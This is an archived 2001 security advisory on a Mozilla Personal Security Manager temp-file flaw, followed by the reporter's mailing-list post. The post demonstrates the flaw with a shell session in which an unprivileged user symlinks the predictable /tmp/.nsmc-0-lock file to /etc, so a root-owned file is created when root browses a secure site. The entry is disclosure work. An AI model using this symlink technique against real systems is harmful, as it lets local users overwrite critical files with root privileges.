Mozilla Personal Security Manager Uses Unsafe Temporary Files and May Allow Local Users to Overwrite Critical Files on the Server
|
Date: Dec 27 2001
|
Impact: Denial of service via local system, Modification of system information
|
Version(s): Mozilla 0.8
|
Description: A vulnerability was reported in the Mozilla Personal Security Manager. A local user could cause files to be overwritten.
A local user can create a symbolic link from a temporary file used by the Mozilla Personal Security Manager (PSM) to another critical
file. Then, when a privileged user accesses a secure web site, thereby invoking Mozilla PSM, the linked file will be overwritten.
|
Impact: A local user may be able to cause critical files to be overwritten on the host.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.mozilla.org/projects/security/pki/psm/ (Links to External Site)
|
Cause: Access control error, State error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: KF <dotslash@snosoft.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Wed, 26 Dec 2001 12:50:59 -0500
From: KF <dotslash@snosoft.com>
Subject: Mozilla personal security manager /tmp issues
|
Playing with /tmp a bit this morning I ran into the following issue in
mozilla...
*with mozilla open
[root@linuxppc root]# fuser -n file /tmp/.nsmc-0-lock
/tmp/.nsmc-0-lock: 3220 3223 3224 3226 3227 3228 3229
[root@linuxppc root]# ps -ef | grep 3220
root 3220 1 0 12:42 ? 00:00:00 ./psm
sh-2.05$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
sh-2.05$ ln -s /etc/hrmm /tmp/.nsmc-0-lock
sh-2.05$ ls -al /etc/hrmm
ls: /etc/hrmm: No such file or directory
*wait for root to go to https://www.securepage.com to view his banking
info.
sh-2.05$ ls -al /etc/hrmm
-rw------- 1 root root 0 Dec 26 12:42 /etc/hrmm
Lets see what happened here.... when root went to the secure page
mozilla calls /usr/lib/mozilla/psm
root 3220 1 1 12:42 ? 00:00:00 ./psm
root 3223 3220 0 12:42 ? 00:00:00 ./psm
root 3224 3223 0 12:42 ? 00:00:00 ./psm
root 3226 3223 0 12:42 ? 00:00:00 ./psm
root 3227 3223 0 12:42 ? 00:00:00 ./psm
root 3228 3223 0 12:42 ? 00:00:00 ./psm
root 3229 3223 0 12:42 ? 00:00:00 ./psm
[root@linuxppc root]# strings /usr/lib/mozilla/psm | grep /tmp/.
/tmp/.nsmc-%d-lock
/tmp/.nsmc-%d
Above is how we ended up with /etc/hrmm....
And of course here is my version info.[root@linuxppc root]# rpm -qa |
grep mozilla
Help -> about mozilla says...
Mozilla 0.8 <http://www.mozilla.org/releases/>
Mozilla/5.0 (X11; U; Linux 2.4.4-6.2mdk ppc; en-US; 0.8) Gecko/20010814
mozilla-psm-0.8-7.1mdk
mozilla-irc-0.8-7.1mdk
mozilla-0.8-7.1mdk
mozilla-mail-0.8-7.1mdk
nautilus-mozilla-1.0.1.1-5mdk
[root@linuxppc root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for ppc
*Happy new year@##$~!
-KF
|
|
